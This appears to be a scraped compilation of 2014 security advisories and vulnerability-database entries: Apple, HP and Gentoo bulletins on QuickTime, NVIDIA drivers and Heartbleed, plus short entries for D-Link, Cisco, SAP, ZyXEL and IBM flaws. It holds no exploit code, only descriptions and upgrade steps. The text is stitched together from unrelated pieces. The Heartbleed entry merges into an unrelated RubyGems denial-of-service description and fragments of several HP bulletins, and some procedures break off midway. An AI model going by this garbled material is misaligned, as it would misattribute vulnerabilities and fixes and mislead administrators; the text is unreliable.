Description: A buffer overflow existed in the handling of PSD
images. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1249 : dragonltx of Tencent Security Team
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An out of bounds byte swapping issue existed in the
handling of 'ttfo' elements. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-1250 : Jason Kratzer working with iDefense VCP
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in the handling of 'stsz'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1245 : Tom Gallagher & Paul Bates working with HP's Zero Day
Initiative
Secure Transport
Available for: OS X Mountain Lion v10.8.5
Impact: An attacker may be able to decrypt data protected by SSL
Description: There were known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite used a block cipher in CBC mode.
To address these issues for applications using Secure Transport, the
1-byte fragment mitigation was enabled by default for this
configuration.
CVE-ID
CVE-2011-3389 : Juliano Rizzo and Thai Duong
OS X Mavericks v10.9.2 includes the content of Safari 7.0.2.
OS X Mavericks v10.9.2 and Security Update 2014-001 may be obtained from
the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBAgAGBQJTDNeoAAoJEPefwLHPlZEwaRAP/3i/2qRvNv6JqmE9p48uEyXn
mlxwXpMyop+vrgMmuiSP14EGSv06HO04PNUtaWPxm7tVYXu0tMtjDcYdIu40TAy6
U0T6QhRZC/uag1DCvdEOvqRUajKmmPtHTCJ6OsQGtGJHlEM+S5XgxRr7qgfkHMfb
OlqFsgpdL/AAiYNfzItN2C+r2Lfwro6LDlxhikpASojlMFQrk8nJ6irRv617anSZ
3DwJW2iJxNfpVrgqA1Nrx1fkrPmeT/8jgGuEP6RaKiWIbfXjRG5BW9WuarMqmaP8
C6XoTaJaqEO9zb7F2uJR0HIYpJd065y/xiYNm91yDWIjdrO3wVgNVPGo1pHVyYsY
Y7lcyHUVJortKF8SHquw0j3Ujeugu8iWp6ND/00/4dGvwb0jzrxPUxkEmJ43130O
t2Obtxdsaa+ub8cZHDN93WB3FQR5hd+KaeXLJC55q0qYY8o8zqdPqXAlYAP2gUQX
iB4Bs7NAh2CNJWNTtk2soTjZOwPvPLSPZ6I3w5i0HVP7HQl5K8chjihAwSeyezCZ
q5gxCiK0lBW88AUd9n3L7ZOW2Rg53mh6+RiUL/VQ7TfidoP417VDKum300pZkgNv
kBCklX9ya7QeLjOMnbnsTk32qG+TiDPgiGZ5IrK6C6T26dexJWbm8tuwPjy5r8mI
aiYIh+SzR0rBdMZRgyzv
=+DAJ
-----END PGP SIGNATURE-----
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201402-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: NVIDIA Drivers: Privilege Escalation
Date: February 02, 2014
Bugs: #493448
ID: 201402-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
A NVIDIA drivers bug allows unprivileged user-mode software to access
the GPU inappropriately, allowing for privilege escalation.
Background
==========
The NVIDIA drivers provide X11 and GLX support for NVIDIA graphic
boards.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 x11-drivers/nvidia-drivers
< 331.20 *>= 304.116
*>= 319.76
>= 331.20
Description
===========
The vulnerability is caused due to the driver allowing unprivileged
user-mode software to access the GPU.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All NVIDIA Drivers users using the 331 branch should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-331.20"
All NVIDIA Drivers users using the 319 branch should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-319.76"
All NVIDIA Drivers users using the 304 branch should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-304.116"
References
==========
[ 1 ] CVE-2013-5986
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5986
[ 2 ] CVE-2013-5987
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5987
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201402-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201312-0547 | No CVE | D-Link DIR Series Router 'model/__show_info.php' Local File Disclosure Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
The D-Link DIR series router 'model/__show_info.php' failed to properly validate user-submitted input, allowing remote attackers to exploit vulnerabilities to submit malicious requests for sensitive file information. D-Link DIR-615 and other wireless router products from D-Link.
A local file leak vulnerability exists in several D-Link DIR series routers. The vulnerability stems from the program's insufficient filtering of user-submitted input. An attacker could use this vulnerability to obtain sensitive information. The following models and versions have vulnerabilities: D-Link DIR-615 0, D-Link DIR-300 2.05B03, D-Link DIR-300 2.04, D-Link DIR-300 2.01B1, D-Link DIR-300 1.05B09, D-Link DIR-300 1.05, D-Link DIR-300 1.04, D-Link DIR-300 0. This may aid in further attacks
| VAR-201312-0236 | CVE-2013-6695 |
Cisco Secure Access Control System of RBAC Vulnerability in which important information is obtained in the implementation of
Related entries in the VARIoT exploits database: VAR-E-201312-0241 |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The RBAC implementation in Cisco Secure Access Control System (ACS) does not properly verify privileges for support-bundle downloads, which allows remote authenticated users to obtain sensitive information via a download action, as demonstrated by obtaining read access to the user database, aka Bug ID CSCuj39274. Cisco Secure ACS is a central management platform for Cisco network devices that controls device authentication and authorization.
Successful exploits will allow attackers to obtain sensitive information. This may result in further attacks.
This issue is tracked by Cisco Bug ID CSCuj39274. The system can respectively control network access and network device access through RADIUS and TACACS protocols
| VAR-201312-0237 | CVE-2013-6696 | Cisco Adaptive Security Appliance Service disruption in software (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Cisco Adaptive Security Appliance (ASA) Software does not properly handle errors during the processing of DNS responses, which allows remote attackers to cause a denial of service (device reload) via a malformed response, aka Bug ID CSCuj28861. Vendors have confirmed this vulnerability Bug ID CSCuj28861 It is released as.Third-party service disruption via malformed response ( Device reload ) There is a possibility of being put into a state. Cisco ASA Software is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuj28861
| VAR-201404-0592 | CVE-2014-0160 |
OpenSSL Buffer error vulnerability
Related entries in the VARIoT exploits database: VAR-E-201404-0110, VAR-E-201404-0107, VAR-E-201404-0108, VAR-E-201404-0109 |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. RubyGems actionpack is prone to a denial-of-service vulnerability.
Remote attackers can exploit this issue to cause denial-of-service conditions.
This vulnerability is fixed in RubyGems actionpack 4.0.2 and 3.2.16.
HP CloudSystem Matrix 7.3 Update 1 v7.3.1.0 and HP CloudSystem built on
ConvergedSystem 700x solutions support customers moving from OA 4.11 to OA
4.12.
NOTE: No patch will be available for HP 3PAR OS 3.1.2 GA. HP recommends that
customers with arrays running HP 3PAR OS 3.1.2 GA should upgrade to the
latest available MU or HP 3PAR OS 3.1.3 P01. HP 3PAR OS Version
Available patch
HP 3PAR OS 3.1.3
P01
HP 3PAR OS 3.1.2 MU1, MU2, and MU3
P39
HP can perform the upgrade. Contact the HP global deployment center at
3par-sps@hp.com. Please include the HP 3PAR StoreServ Storage system serial
number in the subject line. The email service is available 24 hours a day, 7
days a week.
A support case can be opened to request the upgrade, but the email service is
recommended.
No controller node reboot is required for the patch, when staying with the
same OS version.
HISTORY
Version:1 (rev.1) - 22 April 2014 Initial release
Version:2 (rev.2) - 23 April 2014 Added recommendation for use of 3PAR OS
Management Tools. This bulletin will be revised when
the software updates are released.
Notes
Customers also have the option to downgrade OA firmware to any version prior
to OA v4.11 if that meets the requisite Hardware/feature support for the
enclosure configuration.
No action is required unless the OA is running the firmware versions
explicitly listed as vulnerable.
Until the firmware updates are available, HP recommends that customers
disable the HTTPS management protocol and instead manage the device securely
using SSH, and disable the secure SMI-S protocol and use the unsecured SMI-S
protocol if desired. After the protocols have been disabled, change the user
passwords on the array. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3
AirPort Base Station Firmware Update 7.7.3 is now available and
addresses the following:
Available for:
AirPort Extreme and AirPort Time Capsule base stations with 802.11ac
Impact: An attacker in a privileged network position may obtain
memory contents
Description: An out-of-bounds read issue existed in the OpenSSL
library when handling TLS heartbeat extension packets. An attacker in
a privileged network position could obtain information from process
memory. This issue was addressed through additional bounds checking.
Only AirPort Extreme and AirPort Time Capsule base stations with
802.11ac are affected, and only if they have Back to My Mac or Send
Diagnostics enabled. Other AirPort base stations are not impacted by
this issue.
CVE-ID
CVE-2014-0160 : Riku, Antti, and Matti of Codenomicon and Neel Mehta
of Google Security
Installation note for Firmware version 7.7.3
Firmware version 7.7.3 is installed on AirPort Extreme or AirPort
Time Capsule base stations with 802.11ac using AirPort Utility for
Mac or iOS.
Use AirPort Utility 6.3.1 or later on OS X, or AirPort Utility 1.3.1
or later on iOS to upgrade to Firmware version 7.7.3.
AirPort Utility for Mac is a free download from
http://www.apple.com/support/downloads/ and AirPort Utility for iOS
is a free download from the App Store.
OpenSSL is a 3rd party product that is embedded with some of HP Software
products. This bulletin objective is to notify HP Software customers about
products affected by the Heartbleed vulnerability. This weakness
potentially allows disclosure of information protected, under normal
conditions, by the SSL/TLS protocol. The impacted products appear in the list
below are vulnerable due to embedding OpenSSL standard release software. Each bulletin will include a patch and/or mitigation
guideline.
Note: OpenSSL is an external product embedded in HP products.
Bulletin Applicability:
This bulletin applies to each OpenSSL component that is embedded within the
HP products listed in the security bulletin. The bulletin does not apply to
any other 3rd party application (e.g. operating system, web server, or
application server) that may be required to be installed by the customer
according instructions in the product install guide.
To learn more about HP Software Incident Response, please visit http://www8.h
p.com/us/en/software-solutions/enterprise-software-security-center/response-c
enter.html . Please see
the table below. To obtain the updated firmware, follow the below steps to
obtain the firmware Update.
Obtain the firmware update from www.hp.com/go/support
Select "Drivers & Downloads".
Enter the product name listed in the table below into the search field.
Click on "Go".
Click on the appropriate product.
Under "Select operating system" select any Windows operating system from the
list.
Select the appropriate firmware update under "Firmware".
Install HP Management Agents for Windows x86/x64
Install HP Management Agents for RHEL 5 x64
Install HP Management Agents for RHEL 6 x64
Install HP Management Agents for SLES 10 x64
Install HP Management Agents for SLES 11 x64
References: CVE-2014-0160 (SSRT101538)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP has provided manual update steps if version
upgrading is not possible.
Delete the smhamd64-*.exe/smhx86-*.exe" from Component Copy Location listed
in the following table, row 1,2,3,4.
Delete the affected hpsmh-7.*.rpm" from Component Copy Location listed in the
following table, row 5.
In sequence, perform the steps from left to right in the following table.
First, download components from Download Link; Second, rename the component
as suggested in Rename to. Third, copy the component to the location
suggested in Component Copy Location.
Table Row Number
Download Link
Rename to
Component Copy Location
1
http://www.hp.com/swpublishing/MTX-d1488fd987894bc4ab3fe0ef52
smhx86-cp023242.exe
\\express\hpfeatures\hpagents-ws\components\Win2003
2
http://www.hp.com/swpublishing/MTX-4575754bbb614b58bf0ae1ac37
smhamd64-cp023243.exe
\\express\hpfeatures\hpagents-ws\components\Win2003
3
http://www.hp.com/swpublishing/MTX-37075daeead2433cb41b59ae76
smhamd64-cp023341.exe
\\express\hpfeatures\hpagents-ws\components\Win2008
4
http://www.hp.com/swpublishing/MTX-27e03b2f9cd24e77adc9dba94a
smhx86-cp023340.exe
\\express\hpfeatures\hpagents-ws\components\Win2008
5
http://www.hp.com/swpublishing/MTX-bfd3c0fb11184796b9428ced37
Do not rename the downloaded component for this step.
\\express\hpfeatures\hpagents-sles11-x64\components
\\express\hpfeatures\hpagents-sles10-x64\components
\\express\hpfeatures\hpagents-rhel5-x64\components
\\express\hpfeatures\hpagents-rhel6-x64\components
Initiate Install HP Management Agents for SLES 11 x64 on targets running
SLES11 x64.
Initiate Install HP Management Agents for SLES 10 x64 on targets running
SLES10 x64.
Initiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL
6 x64.
Initiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL
5 x64.
Initiate Install HP Management Agents for Windows x86/x64 on targets running
Windows. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04263236
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04263236
Version: 2
HPSBMU03022 rev.2 - HP Systems Insight Manager (SIM) Bundled Software running
OpenSSL, Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-04-25
Last Updated: 2014-05-13
Potential Security Impact: Remote disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Systems
Insight Management (SIM) bundled software running OpenSSL. This is the
OpenSSL vulnerability known as "Heartbleed" which could be exploited remotely
resulting in disclosure of information.
The HP SIM software itself is not vulnerable to CVE-2014-0160 ("Heartbleed").
However, the software components bundled with HP SIM are impacted and should
be addressed if installed.
References: CVE-2014-0160, SSRT101527
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Systems Insight Manager 7.2, 7.2.1, 7.2.2, 7.3, and 7.3.1 bundled with the
following software:
HP Smart Update Manager (SUM) 6.0.0 through 6.3.0
HP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,
v7.3.1 for Linux and Windows
WMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1
HP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for
Windows
HP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux
HP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,
and v7.3.1 for Windows
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has addressed this vulnerability for the impacted software components
bundled with HP Systems Insight Manager (SIM) in the following HP Security
Bulletins:
HP SIM Component
HP Security Bulletin
Security Bulletin Location
HP Smart Update Manager (SUM)
HPSBMU02997
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_
na-c04239375
HP System Management Homepage (SMH)
HPSBMU02998
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_
na-c04239372
WMI Mapper for HP Systems Insight Manager
HPSBMU03013
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_
na-c04260385
HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM)
on Linux and Windows,
HPSBMU03020
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_
na-c04262472
Note: If customers believe that the SIM installation was compromised while it
was running components vulnerable to Heartbleed they need to take the
following actions once they have upgraded to the non-vulnerable components.
This includes revoking, recreating, and re-importing certificates and
resetting passwords that might have been harvested by a malicious attacker
using the Heartbleed vulnerability.
HP has made the following hot fixes available for SIM v7.2.x that fix the
Heartbleed vulnerability: The HP SIM 7.2 Hotfix Kit is available in the
following location and is applicable to HP SIM 7.2.x installations. Please
read through the readme.txt file before proceeding with the installation.
Please click on the HP SIM 7.2 HotFix Kit link to download the hot fix for
your operating system platform:
http://h18013.www1.hp.com/products/servers/management/hpsim/download.html
After installing SIM72_hotfix_2014_Apr_win.exe hotfix, HP Systems Management
Homepage has to be manually upgraded if it is already installed on the CMS.
HP SMH installer for 32-bit and 64-bit can be found in the CMS under the
location SIM_INSTALL_DIR\smartcomponents . The installer filenames are
cp023242.exe and cp023243.exe.
In case it is suspected that the infrastructure has been compromised, the
user needs to create new HP SIM Server certificate and Single Sign-on (sso)
certificates. To create new server and sso certificates, refer the HP SIM 7.2
Command Line Interface guide which can be found in the below URL:
ttp://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library/inde
x
Refer to the mxcert command section which has the details to create new
server and sso certificates.
Once the new server certificate is created, it will invalidate any trust
relationship between CMS and any other system that depend on this
certificate, such as browsers. The user must re-establish the trust between
CMS and other system that uses this certificate, and revoke any previous SIM
certificates from any device previously configured to trust SIM (Onboard
Administrator, Virtual Connect Module, iLOs, and SMH instances).
Once the new sso certificate is created, the user must re-establish the trust
between HP SIM and managed devices (HP SMH, ILO, OA. VC) for Single Sign-on
to work. To reestablish trust with the sso certificate, refer to HP SIM 7.2
user guide and HP SIM Online help (under security section). HP SIM 7.2 user
guide is located in the below URL:
http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-c03651392-3.pdf
HP SIM 7.3 user guide is located in the below URL:
http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-c04030739-2.pdf
CMS Reconfigure Tool (aka mxrefconfig)
In case it is suspected that CMS OS credentials are also compromised, then it
is recommended that credentials are changed. The SIM User Guide (Chapter 19
CMS Reconfigure Tool pg 93) provides two procedures to change the service
account password along with other related accounts. The procedures to follow
are:
Procedure 18 - Changing the CMS password for HP SIM and Insight Control
Procedure 19 - Changing CMS password for Matrix OE and Operations
Orchestration
Note:
if the customer has Insight Control server deployment installed, procedures
to change the password are documented in the HP Insight Control Server
Deployment User Guide.
Frequently Asked Questions:
Will updated systems require a reboot after applying the SIM hotfix?
No, reboot of the system will not be required. Installing the new build would
be sufficient to get back to the normal state.
Will new certificates be issued along with the patch, or need to be handled
separately?
If you suspect the certificate has been compromised due to this
vulnerability, we do recommend creating new certificates for server and
Single Sign-on and revoking previous certificates. Instructions on creating
new certificate and re-establishing trust between CMS and managed devices are
in the notes above.
- From where can I get HP SIM documentation?
All major documents are available at:
http://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library/ind
ex.aspx?cat=insightmanagement&subcat=sim#.U2yioSi20tM
HISTORY
Version:1 (rev.1) - 25 April 2014 Initial release
Version:2 (rev.2) - 13 May 2014 Added additional remediation steps and v7.2
Hotfix
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlNyXGAACgkQ4B86/C0qfVmjYgCggwxWeqRDnEyVKK5E1ZRxB5Lh
kYwAnj6XwjTIE82rjAsetI1Af/VO2tsC
=XSLk
-----END PGP SIGNATURE-----
| VAR-201312-0304 | CVE-2013-7043 | Cisco Scientific Atlanta DPR2320 Cross-site request forgery vulnerability in router software |
CVSS V2: 8.3 CVSS V3: - Severity: HIGH |
Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity; (2) reboot the device via the Restart parameter to goform/restart; (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity; or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic. The Cisco DPR2320R2 Wireless Router is a wireless router product from the United States Cisco.
A cross-site request forgery vulnerability exists in the Cisco DPR2320R2 wireless router using firmware version 2.0.2r1262-090417. A remote attacker could use this vulnerability to perform administrator actions to control the affected device. Cisco Scientific Atlanta DPR2320R2 is a cable modem gateway device of Cisco (Cisco). The device includes a cable modem, router and wireless access point, enabling multiple PCs, notebooks or other network devices to share broadband access
| VAR-201311-0241 | CVE-2013-6918 | Satechi Smart Travel Router Web Management Console Remote Authentication Bypass Vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
The web interface on the Satechi travel router 1.5, when Wi-Fi is used for WAN access, exposes the console without authentication on the WAN IP address regardless of the "Web Management via WAN" setting, which allows remote attackers to bypass intended access restrictions via HTTP requests. The Satechi Smart Travel Router is a wireless router device. A remote attacker can bypass the access restriction control device by submitting an HTTP request. Satechi Travel Router is a portable router product of American Satechi Company that includes standard international plug adapters, USB chargers and WiFi (802.11b/g/n) routers
| VAR-201312-0311 | CVE-2013-7094 | SAP NetWeaver of RSDDCVER_COUNT_TAB_COLS In function SQL Injection vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver \"RSDDCVER_COUNT_TAB_COLS\" function fails to properly filter user-submitted input, allowing remote attackers to exploit vulnerabilities to submit special SQL queries that can retrieve or manipulate database information. SAP NetWeaver is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SAP NetWeaver 7.30 is vulnerable; other versions may also be affected
| VAR-201311-0517 | No CVE | ZyXEL GS1510-16 'webctrl.cgi' Remote Password Disclosure Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
ZyXEL GS1510-16 is prone to a password-disclosure vulnerability.
Attackers can exploit this issue to gain access to administrator password that may lead to further attacks.
| VAR-201312-0461 | CVE-2013-6718 | IBM BladeCenter For system Advanced Management Module Vulnerabilities in the acquisition of account names and passwords in firmware |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
The Advanced Management Module (AMM) with firmware 3.64B, 3.64C, and 3.64G for IBM BladeCenter systems allows remote attackers to discover account names and passwords via use of an unspecified interface.
Little is known about this issue or its effects at this time. We will update this BID as more information emerges
| VAR-201311-0401 | No CVE | Interstage Application Server/Studio Log Feature Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Interstage Application Server is an application platform that supports building and running business systems. The Interstage Application Server/Studio logging feature (ihsrlog/rotatelogs) has an unspecified error that allows a remote attacker to exploit a vulnerability for a buffer overflow attack and execute arbitrary code in the application context